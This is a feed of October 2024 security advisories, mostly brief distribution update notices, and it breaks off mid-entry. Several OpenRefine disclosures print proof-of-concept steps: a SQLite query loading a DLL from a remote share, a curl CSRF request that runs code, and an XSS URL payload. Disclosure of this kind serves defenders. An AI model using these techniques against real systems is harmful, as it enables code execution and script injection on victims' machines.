https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3P8V-W8MR-M3X8
25.10.2024 00:46:04	maven	[MAVEN:GHSA-J8HP-F2MJ-586G] OpenRefine's error page lacks escaping, leading to potential Cross-site Scripting on import of malicious project (moderate)	### SummaryThe built-in "Something went wrong!" error page includes the exception message and exception traceback without escaping HTML tags, enabling injection into the page if an attacker can reliably produce an error with an attacker-influenced message.It appears that the only way to reach this code in OpenRefine itself is for an attacker to somehow convince a victim to import a malicious file, as in GHSA-m88m-crr9-jvqq, which may be difficult. However, out-of-tree extensions may add their own calls to `respondWithErrorPage`.### DetailsThe `Command.respondWithErrorPage` (through `HttpUtilities.respondWithErrorPage`) function renders the Velocity template `error.vt`, which contains the `$message` and `$stack` variables, which are included in the response as-is:https://github.com/OpenRefine/OpenRefine/blob/master/main/webapp/modules/core/error.vt#L52-L53However, the message can contain HTML tags, which would then be interpreted by the browser. A mitigation would be to escape both the message and stack trace, perhaps using Guava's HTML escaper.Flows that report errors as `application/json` responses are not interpreted by the browser and so not affected by this issue.### PoCIn OpenRefine, use the "Import project" feature to import the following URL (or upload it as a file): https://wandernauta.nl/oa/example.tar.gzA JavaScript alert appears.### ImpactExecution of arbitrary JavaScript in the victim's browser, provided the victim can be convinced to import a malicious project. The script can do anything the user can do.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J8HP-F2MJ-586G
24.10.2024 21:11:21	maven	[MAVEN:GHSA-87CF-J763-VVH8] OpenRefine's SQLite integration allows filesystem access, remote code execution (RCE) (high)	### SummaryIn the `database` extension, the "enable_load_extension" property can be set for the SQLite integration, enabling an attacker to load (local or remote) extension DLLs and so run arbitrary code on the server.The attacker needs to have network access to the OpenRefine instance.### DetailsThe `database` extension, with some restrictions, lets users connect to any database they wish by filling in different parts of the JDBC URL that is used. For the SQLite integration, the extension expects a file path pointing to a database file (or a place where such a file can be created). This means that users can:* Read files on local or SMB filesystems, provided they are SQLite databases.* Write to files on local or SMB filesystems, as long as those files are either SQLite databases or empty.This seems to be the expected behavior.However, by adding `?enable_load_extension=true` to the filename, a [feature](https://www.sqlite.org/loadext.html) is toggled that additionally allows loading and executing shared libraries mentioned in queries, leading to remote code execution. On Windows specifically, those libraries may also come from shared folders.Possible mitigation and hardening steps could include:- Having users upload the SQLite database file they want to look at, storing it under some safe name, then opening that, rather than accepting a file path- If that is not feasible: making the path relative to, and checking that it does not escape, the workspace directory- If that is also not feasible: adding additional checks so that the path at least does not point to other machines or add JDBC parameters- Always using the READONLY open mode- Explicitly setting enable_load_extension to off- Enforcing [stricter limits](https://www.sqlite.org/security.html) and similar precautions### PoCTested on a Windows 11 machine. 1. Start OpenRefine and choose "Create project", "Database", database type "SQLite".2. Type a writable file path followed by `?enable_load_extension=true`.3. Click Connect. The connection should succeed.4. Use `SELECT load_extension('\\wandernauta.nl\public\libcalculator.dll');` as the query.5. Assuming there are no firewalls in the way, a few Windows calculators should open.The same file is available from https://wandernauta.nl/libcalculator.dll if needed.### ImpactRemote code execution for attackers with network access to OpenRefine.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-87CF-J763-VVH8
25.10.2024 00:46:03	maven	[MAVEN:GHSA-79JV-5226-783F] OpenRefine has a reflected cross-site scripting vulnerability (XSS) from POST request in ExportRowsCommand (high)	### SummaryThe `export-rows` command can be used in such a way that it reflects part of the request verbatim, with a Content-Type header also taken from the request.An attacker could lead a user to a malicious page that submits a form POST that contains embedded JavaScript code. This code would then be included in the response, along with an attacker-controlled `Content-Type` header, and so potentially executed in the victim's browser as if it was part of OpenRefine.The attacker must know a valid project ID of a project that contains at least one row.### DetailsThe malicious form sets `contentType` to `text/html` (ExportRowsCommand.java line 101) and `preview` to `true` (line 107). This combination causes the browser to treat what OpenRefine thinks of as an export preview as a regular webpage.It would be safer if the `export-rows` command did not allow overriding the Content-Type header at all, instead relying on the exporter to provide the correct Content-Type. It could also require a CSRF token. As an additional measure, it could add a Content-Security-Policy header to the response disabling scripts and such entirely.At least the CSV exporter (`separator` and `lineSeparator` fields) and templating exporter (any field) are affected. It may also be possible to inject into the `dateSettings.custom` field or the SQL exporter default value field, if the project contains date or null cells.### PoCAn example form that demonstrates the issue is available on https://wandernauta.nl/os/.### ImpactExecution of arbitrary JavaScript in the user's browser. The attacker-provided code can do anything the user can do, including deleting projects, retrieving database passwords, or executing arbitrary Jython or Closure expressions, if those extensions are also present.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-79JV-5226-783F
25.10.2024 00:46:01	maven	[MAVEN:GHSA-3JM4-C6QF-JRH3] OpenRefine's PreviewExpressionCommand, which is eval, lacks protection against cross-site request forgery (CSRF) (high)	### SummaryLack of CSRF protection on the `preview-expression` command means that visiting a malicious website could cause an attacker-controlled expression to be executed. The expression can contain arbitrary Clojure or Python code.The attacker must know a valid project ID of a project that contains at least one row.### DetailsThe `com.google.refine.commands.expr.PreviewExpressionCommand` class contains the following comment:```/** * The command uses POST but does not actually modify any state so it does not require CSRF. */```However, this appears to be false (or no longer true). The expression being previewed (executed) can be written in GREL, Python, or Clojure. Since there are no restrictions on what code can be executed, the expression can do anything the user running OpenRefine can do. For instance, the following expressions start a calculator:```clojure:(.exec (Runtime/getRuntime) "gnome-calculator")``````jython:import os;os.system("gnome-calculator")```The lack of restrictions on expressions is arguably not a problem if the user is typing their own expressions into OpenRefine: they could have just as well typed them into Clojure or Python directly. However, since the `preview-expression` command does not check for a CSRF token, the expression can actually come from a HTML form submitted by a different origin, including arbitrary websites.Issue #2164 suggested adding CSRF protection to all endpoints, but this endpoint was skipped (and the above comment added) in the associated PR #2182.### PoCAn example "malicious" page is at https://wandernauta.nl/or/ (of course, actual malicious pages would not wait for the victim to press the submit button).The following curl command (substituting the project ID) also demonstrates the issue:```shcurl -d project=123456789 -d cellIndex=1 -d rowIndices='[0]' -d 'expression=clojure:(.exec (Runtime/getRuntime) "gnome-calculator")' http://localhost:3333/command/core/preview-expression/```### ImpactCSRF into remote code execution, provided the attacker knows at least one project ID in the victim's workspace and can convince the victim to open a malicious webpage.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3JM4-C6QF-JRH3
25.10.2024 00:46:01	maven	[MAVEN:GHSA-PW3X-C5VP-MFC3] OpenRefine has a reflected cross-site scripting vulnerability (XSS) in GData extension (authorized.vt) (high)	### SummaryThe `/extension/gdata/authorized` endpoint includes the `state` GET parameter verbatim in a `<script>` tag in the output, so without escaping.An attacker could lead or redirect a user to a crafted URL containing JavaScript code, which would then cause that code to be executed in the victim's browser as if it was part of OpenRefine.### DetailsThe `state` GET parameter is read from:* extensions/gdata/module/MOD-INF/controller.js:105It is used (as `$state`) in:* extensions/gdata/module/authorized.vt:43There is no check that the state has the expected format (base64-encoded JSON with values like "openrefine123..." and "cb123..."), or that the page was indeed opened as part of the authorization flow.### PoCNavigate to: http://localhost:3333/extension/gdata/authorized?state=%22,alert(1),%22&error=An alert box pops up.The gdata extension needs to be present. No other configuration is needed; specifically, it is not required to have a client ID or client secret set.### ImpactExecution of arbitrary JavaScript in the user's browser. The attacker-provided code can do anything the user can do, including deleting projects, retrieving database passwords, or executing arbitrary Jython or Closure expressions, if those extensions are also present.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PW3X-C5VP-MFC3
24.10.2024 22:00:47	maven	[MAVEN:GHSA-JMRF-85G8-X8XV] Apache Syncope: Stored XSS in Console and Enduser (moderate)	When editing objects in the Syncope Console, incomplete HTML tags could be used to bypass HTML sanitization. This made it possible to inject stored XSS payloads which would trigger for other users during ordinary usage of the application.XSS payloads could also be injected in Syncope Enduser when editing “Personal Information” or “User Requests”: such payloads would trigger for administrators in Syncope Console, thus enabling session hijacking.Users are recommended to upgrade to version 3.0.9, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JMRF-85G8-X8XV
24.10.2024 15:33:56	rubysec	[RUBYSEC:CAMALEON_CMS-2024-48652] camaleon_cms affected by cross site scripting (medium)	Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allowsremote attacker to execute arbitrary code via the content groupname field.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-2024-48652
24.10.2024 11:49:12	almalinux	[ALSA-2024:8353] NetworkManager-libreswan security update (important)	NetworkManager-libreswan security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8353
24.10.2024 10:32:06	almalinux	[ALSA-2024:8374] python3.11 security update (moderate)	python3.11 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8374
24.10.2024 10:36:13	almalinux	[ALSA-2024:8359] python39:3.9 and python39-devel:3.9 security update (moderate)	python39:3.9 and python39-devel:3.9 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8359
26.10.2024 06:15:48	fedora	[FEDORA-2024-180560c54b] Fedora 39: dotnet8.0	This is the October 2024 security release of .NET 8. The SDK version is 8.0.110and the Runtime version is 8.0.10.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-180560c54b
26.10.2024 06:12:48	fedora	[FEDORA-2024-204d982a2e] Fedora 40: dotnet8.0	This is the October 2024 security release of .NET 8. The SDK version is 8.0.110and the Runtime version is 8.0.10.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-204d982a2e
26.10.2024 06:05:01	fedora	[FEDORA-2024-a078d86829] Fedora 41: thunderbird	Update to 128.3.3https://www.thunderbird.net/en-US/thunderbird/128.3.3esr/releasenotes/Update to 128.3.2https://www.thunderbird.net/en-US/thunderbird/128.3.2esr/releasenotes/Update to 128.3.1https://www.thunderbird.net/en-US/thunderbird/128.3.1esr/releasenotes/Update to 128.3.0https://www.mozilla.org/en-US/security/advisories/mfsa2024-49/https://www.thunderbird.net/en-US/thunderbird/128.3.0esr/releasenotes/	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a078d86829
26.10.2024 06:04:51	fedora	[FEDORA-2024-2e8944621e] Fedora 41: NetworkManager-libreswan	This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPNplugin for NetworkManager.It fixes a local privilege escalation bug due to improper escaping of Libreswanconfiguration. (CVE-2024-9050)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2e8944621e
26.10.2024 06:04:30	fedora	[FEDORA-2024-3a6f9ab958] Fedora 41: chromium	Update to 130.0.6723.58 * High CVE-2024-9954: Use after free in AI * Medium CVE-2024-9955: Use after free in Web Authentication * Medium CVE-2024-9956: Inappropriate implementation in Web Authentication * Medium CVE-2024-9957: Use after free in UI * Medium CVE-2024-9958: Inappropriate implementation in PictureInPicture * Medium CVE-2024-9959: Use after free in DevTools * Medium CVE-2024-9960: Use after free in Dawn * Medium CVE-2024-9961: Use after free in Parcel Tracking * Medium CVE-2024-9962: Inappropriate implementation in Permissions * Medium CVE-2024-9963: Insufficient data validation in Downloads * Low CVE-2024-9964: Inappropriate implementation in Payments * Low CVE-2024-9965: Insufficient data validation in DevTools * Low CVE-2024-9966: Inappropriate implementation in Navigations	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3a6f9ab958
26.10.2024 06:04:20	fedora	[FEDORA-2024-cc3d21b83b] Fedora 41: dotnet8.0	This is the October 2024 security release of .NET 8. The SDK version is 8.0.110and the Runtime version is 8.0.10.Release Notes:SDK: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.110.mdRuntime: https://github.com/dotnet/core/blob/main/release-notes/8.0/8.0.10/8.0.10.md	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cc3d21b83b
26.10.2024 06:03:47	fedora	[FEDORA-2024-8f1374ecfb] Fedora 41: mbedtls3.6	Update to 3.6.2Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-3.6.2	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8f1374ecfb
26.10.2024 06:03:45	fedora	[FEDORA-2024-05dedb1a53] Fedora 41: python-platformio, python-openapi-core, python-fastapi, python-starlette	Security fix for CVE-2024-47874.Starlette 0.40.0 (October 15, 2024)This release fixes a Denial of service (DoS) via multipart/form-data requests.You can view the full security advisory:GHSA-f96h-pmfr-66vwFixedAdd max_part_size to MultiPartParser to limit the size of parts inmultipart/form-data requests fd038f3.FastAPI 0.115.2https://github.com/fastapi/fastapi/releases/tag/0.115.2https://github.com/fastapi/fastapi/releases/tag/0.115.1	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-05dedb1a53
26.10.2024 06:03:37	fedora	[FEDORA-2024-362915851c] Fedora 41: yarnpkg	Update bundled ws (CVE-2024-37890)Update bundled elliptic to fix CVE-2024-48949.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-362915851c
26.10.2024 06:03:37	fedora	[FEDORA-2024-21666fa7f2] Fedora 41: rust-pyo3, rust-pyo3-macros, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros-backend	Update pyo3 to version 0.22.4.This version addresses a potential use-after-free RUSTSEC-2024-0378.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-21666fa7f2
26.10.2024 06:03:22	fedora	[FEDORA-2024-b5da13e80a] Fedora 41: suricata	Various security, performance, accuracy, and stability issues have been fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b5da13e80a
26.10.2024 06:02:39	fedora	[FEDORA-2024-17a3b4d4c3] Fedora 41: python-rpyc	Fix CVE-2024-27758	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-17a3b4d4c3
26.10.2024 06:02:38	fedora	[FEDORA-2024-fd57a07560] Fedora 41: oath-toolkit	This is new version fixing possible local privilege escalation.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-fd57a07560
26.10.2024 06:02:29	fedora	[FEDORA-2024-f474f99541] Fedora 41: libdigidocpp	Upstream release of libdigidocpp	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f474f99541
26.10.2024 06:01:58	fedora	[FEDORA-2024-73b41ae8e5] Fedora 41: dnsdist	Update to latest upstream	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-73b41ae8e5
25.10.2024 13:30:29	suse	[SUSE-SU-2024:3757-1] Security update for openssl-1_1 (moderate)	Security update for openssl-1_1	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3757-1
25.10.2024 09:30:33	almalinux	[ALSA-2024:8162] kernel security update (moderate)	kernel security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8162
28.10.2024 05:54:30	fedora	[FEDORA-2024-69528c0ba6] Fedora 40: prometheus-podman-exporter	release 1.13.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-69528c0ba6
28.10.2024 05:54:29	fedora	[FEDORA-2024-afa796a751] Fedora 40: podman-tui	release 1.2.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-afa796a751
28.10.2024 05:54:18	fedora	[FEDORA-2024-45df72afc6] Fedora 40: edk2	Security fix for CVE-2023-6237 (openssl: Excessive time spent checking invalidRSA public keys)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-45df72afc6
28.10.2024 03:05:28	fedora	[FEDORA-2024-6a0e07c9c7] Fedora 39: chromium	update to 130.0.6723.69 * High CVE-2024-10229: Inappropriate implementation in Extensions * High CVE-2024-10230: Type Confusion in V8 * High CVE-2024-10231: Type Confusion in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6a0e07c9c7
28.10.2024 03:04:59	fedora	[FEDORA-2024-ee9f0f22b6] Fedora 39: prometheus-podman-exporter	release 1.13.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ee9f0f22b6
28.10.2024 03:04:58	fedora	[FEDORA-2024-1068d5c32b] Fedora 39: podman-tui	release 1.2.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1068d5c32b
28.10.2024 03:04:52	fedora	[FEDORA-2024-df41d584d0] Fedora 39: glibc	Auto-sync with upstream branch release/2.38/masterAdd BuildRequires:gzip for compressed character maps and info files.Upstream commit: 4dd8641461463b667b5503ab0ea4abcf261378a9Add crt1-2.0.o for glibc 2.0 compatibility testslibio: Attempt wide backup free only for non-legacy codenptl: Use facilities in tst-setuid3posix: Use facilities in tst-truncate and tst-truncate64ungetc: Fix backup buffer leak on program exit [BZ #27821]ungetc: Fix uninitialized read when putting into unused streams [BZ #27821]Make tst-ungetc use libsupportstdio-common: Add test for vfscanf with matches longer than INT_MAX [BZ #27650]support: Add FAIL test failure helperx86: Fix bug in strchrnul-evex512 [BZ #32078]Fix name space violation in fortify wrappers (bug 32052)resolv: Fix tst-resolv-short-response for older GCC (bug 32042)Update syscall lists for Linux 6.5Add mremap testsmremap: Update manual entrylinux: Update the mremap C implementation [BZ #31968]resolv: Track single-request fallback via _res._flags (bug 31476)resolv: Do not wait for non-existing second DNS response after error (bug 30081)resolv: Allow short error responses to match any query (bug 31890)Linux: Make __rseq_size useful for feature detection (bug 31965)elf: Make dl-rseq-symbols Linux onlynptl: fix potential merge of __rseq_* relro symbolss390x: Fix segfault in wcsncmp [BZ #31934]misc: Add support for Linux uio.h RWF_NOAPPEND flagi386: Disable Intel Xeon Phi tests for GCC 15 and above (BZ 31782)Force DT_RPATH for --enable-hardcoded-path-in-testsresolv: Fix some unaligned accesses in resolver [BZ #30750]nscd: Use time_t for return type of addgetnetgrentXelf: Also compile dl-misc.os with $(rtld-early-cflags)CVE-2024-33601, CVE-2024-33602: nscd: netgroup: Use two buffers inaddgetnetgrentX (bug 31680)CVE-2024-33600: nscd: Avoid null pointer crashes after notfound response (bug31678)CVE-2024-33600: nscd: Do not send missing not-found response in addgetnetgrentX(bug 31678)CVE-2024-33599: nscd: Stack-based buffer overflow in netgroup cache (bug 31677)i386: ulp update for SSE2 --disable-multi-arch configurationsnptl: Fix tst-cancel30 on kernels without ppoll_time64 supportlogin: structs utmp, utmpx, lastlog _TIME_BITS independence (bug 30701)login: Check default sizes of structs utmp, utmpx, lastlogsparc: Remove 64 bit check on sparc32 wordsize (BZ 27574)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-df41d584d0
27.10.2024 22:34:42	fedora	[FEDORA-2024-1178c53bb1] Fedora 41: chromium	update to 130.0.6723.69 * High CVE-2024-10229: Inappropriate implementation in Extensions * High CVE-2024-10230: Type Confusion in V8 * High CVE-2024-10231: Type Confusion in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1178c53bb1
27.10.2024 22:34:10	fedora	[FEDORA-2024-28e375f8ca] Fedora 41: prometheus-podman-exporter	release 1.13.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-28e375f8ca
27.10.2024 22:34:09	fedora	[FEDORA-2024-1cab90a9e7] Fedora 41: podman-tui	release 1.2.3	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1cab90a9e7
29.10.2024 21:40:08	npm	[NPM:GHSA-HC5W-C9F8-9CC4] Langchain Path Traversal vulnerability (moderate)	A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HC5W-C9F8-9CC4
29.10.2024 21:38:30	npm	[NPM:GHSA-6M59-8FMV-M5F9] @langchain/community SQL Injection vulnerability (low)	A vulnerability in the GraphCypherQAChain class of langchain-ai/langchainjs versions 0.2.5 and all versions with this class allows for prompt injection, leading to SQL injection. This vulnerability permits unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6M59-8FMV-M5F9
29.10.2024 23:33:11	maven	[MAVEN:GHSA-7MQJ-XGF8-P59V] Apache NiFi Cross-site Scripting vulnerability (moderate)	Apache NiFi 1.10.0 through 1.27.0 and 2.0.0-M1 through 2.0.0-M3 support a description field for Parameters in a Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.28.0 or 2.0.0-M4 is the recommended mitigation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MQJ-XGF8-P59V
29.10.2024 14:38:06	almalinux	[ALSA-2024:8563] buildah security update (important)	buildah security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8563
28.10.2024 21:44:11	maven	[MAVEN:GHSA-J945-C44V-97G6] MPXJ has a Potential Path Traversal Vulnerability (moderate)	### ImpactThe patch for the historical vulnerability CVE-2020-35460 in MPXJ is incomplete as there is still a possibility that a malicious path could be constructed which would not be picked up by the original fix and allow files to be written to arbitrary locations.### PatchesThe issue is addressed in MPXJ version 13.5.1### WorkaroundsDo not pass zip files to MPXJ.### ReferencesN/A	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J945-C44V-97G6
28.10.2024 19:59:30	maven	[MAVEN:GHSA-C4Q5-6C82-3QPW] Spring Security vulnerable to Authorization Bypass of Static Resources in WebFlux Applications (critical)	Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances.For this to impact an application, all of the following must be true: * It must be a WebFlux application * It must be using Spring's static resources support * It must have a non-permitAll authorization rule applied to the static resources support	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C4Q5-6C82-3QPW
28.10.2024 05:55:00	fedora	[FEDORA-2024-f1117faa03] Fedora 40: chromium (high)	update to 130.0.6723.69 * High CVE-2024-10229: Inappropriate implementation in Extensions * High CVE-2024-10230: Type Confusion in V8 * High CVE-2024-10231: Type Confusion in V8	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f1117faa03
28.10.2024 17:05:27	npm	[NPM:GHSA-HXF3-VGPM-FV9P] CycloneDX cdxgen may execute code contained within build-related files (moderate)	CycloneDX cdxgen through 10.10.7, when run against an untrusted codebase, may execute code contained within build-related files such as build.gradle.kts, a similar issue to CVE-2022-24441. cdxgen is used by, for example, OWASP dep-scan. NOTE: this has been characterized as a design limitation, rather than an implementation mistake.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HXF3-VGPM-FV9P
28.10.2024 17:01:52	npm	[NPM:GHSA-MGFV-M47X-4WQP] useragent Regular Expression Denial of Service vulnerability (moderate)	Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MGFV-M47X-4WQP
28.10.2024 16:56:39	npm	[NPM:GHSA-3PHV-83CJ-P8P7] nope-validator Regular Expression Denial of Service vulnerability (moderate)	Nope is a JavaScript validator. Versions 0.11.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). This vulnerability is fixed in 0.12.1.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3PHV-83CJ-P8P7
28.10.2024 16:51:34	npm	[NPM:GHSA-RV73-9C8W-JP4C] validate.js Regular Expression Denial of Service vulnerability (moderate)	Validate.js provides a declarative way of validating javascript objects. Versions 0.13.1 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV73-9C8W-JP4C
28.10.2024 16:50:19	npm	[NPM:GHSA-68QG-G787-3RP5] Knwl.js Regular Expression Denial of Service vulnerability (moderate)	Knwl.js is a Javascript library that parses through text for dates, times, phone numbers, emails, places, and more. Versions 1.0.2 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68QG-G787-3RP5
28.10.2024 16:44:58	npm	[NPM:GHSA-PMVV-57RG-5G86] CommonRegexJS Regular Expression Denial of Service vulnerability (moderate)	CommonRegexJS is a CommonRegex port for JavaScript. All available versions contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMVV-57RG-5G86
28.10.2024 16:44:07	npm	[NPM:GHSA-P8PC-3F7W-JR5Q] Foundation Regular Expression Denial of Service vulnerability (moderate)	Foundation is a front-end framework. Versions 6.3.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any fixes are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P8PC-3F7W-JR5Q
28.10.2024 16:40:04	npm	[NPM:GHSA-W455-MFQ9-HF74] insane vulnerable to Regular Expression Denial of Service (moderate)	insane is a whitelist-oriented HTML sanitizer. Versions 2.6.2 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W455-MFQ9-HF74
31.10.2024 04:15:28	fedora	[FEDORA-2024-dee1ef052e] Fedora 40: firefox	New upstream update (132.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dee1ef052e
31.10.2024 04:15:18	fedora	[FEDORA-2024-f9ca680ecd] Fedora 40: micropython	Update to 1.23.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f9ca680ecd
31.10.2024 04:15:17	fedora	[FEDORA-2024-e88cc97dba] Fedora 40: NetworkManager-libreswan	This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPNplugin for NetworkManager. It fixes a local privilege escalation bug due toimproper escaping of Libreswan configuration. (CVE-2024-9050)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e88cc97dba
31.10.2024 03:38:49	fedora	[FEDORA-2024-d20b38c63f] Fedora 39: NetworkManager-libreswan	This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPNplugin for NetworkManager. It fixes a local privilege escalation bug due toimproper escaping of Libreswan configuration. (CVE-2024-9050)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d20b38c63f
31.10.2024 03:38:49	fedora	[FEDORA-2024-9c81ad492a] Fedora 39: micropython	Update to 1.23.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c81ad492a
31.10.2024 03:38:44	fedora	[FEDORA-2024-ab6348928b] Fedora 39: libarchive	Fix for CVE-2024-48957	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ab6348928b
31.10.2024 03:38:31	fedora	[FEDORA-2024-24fbd327e3] Fedora 41: firefox	New upstream update (132.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-24fbd327e3
31.10.2024 03:38:29	fedora	[FEDORA-2024-80c8f31c55] Fedora 41: xorg-x11-server-Xwayland	xwayland 24.1.4 - CVE fix for CVE-2024-9632	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80c8f31c55
31.10.2024 03:38:17	fedora	[FEDORA-2024-cd5c1dfa94] Fedora 41: micropython	Update to 1.23.0	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cd5c1dfa94
31.10.2024 00:05:02	slackware	[SSA:2024-304-04] xorg-server (high)	New xorg-server packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/xorg-server-1.20.14-i586-14_slack15.0.txz: Rebuilt. This update fixes a security issue: By providing a modified bitmap, a heap-based buffer overflow may occur. This may lead to local privilege escalation if the server is run as root or remote code execution (e.g. x11 over ssh). This vulnerability was discovered by: Jan-Niklas Sohn working with Trend Micro Zero Day Initiative For more information, see: https://lists.x.org/archives/xorg-announce/2024-October/003545.html https://www.cve.org/CVERecord?id=CVE-2024-9632 (* Security fix )patches/packages/xorg-server-xephyr-1.20.14-i586-14_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xnest-1.20.14-i586-14_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xvfb-1.20.14-i586-14_slack15.0.txz: Rebuilt.patches/packages/xorg-server-xwayland-21.1.4-i586-12_slack15.0.txz: Rebuilt. This update fixes a security issue: By providing a modified bitmap, a heap-based buffer overflow may occur. This may lead to local privilege escalation if the server is run as root or remote code execution (e.g. x11 over ssh). This vulnerability was discovered by: Jan-Niklas Sohn working with Trend Micro Zero Day Initiative For more information, see: https://lists.x.org/archives/xorg-announce/2024-October/003545.html https://www.cve.org/CVERecord?id=CVE-2024-9632 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 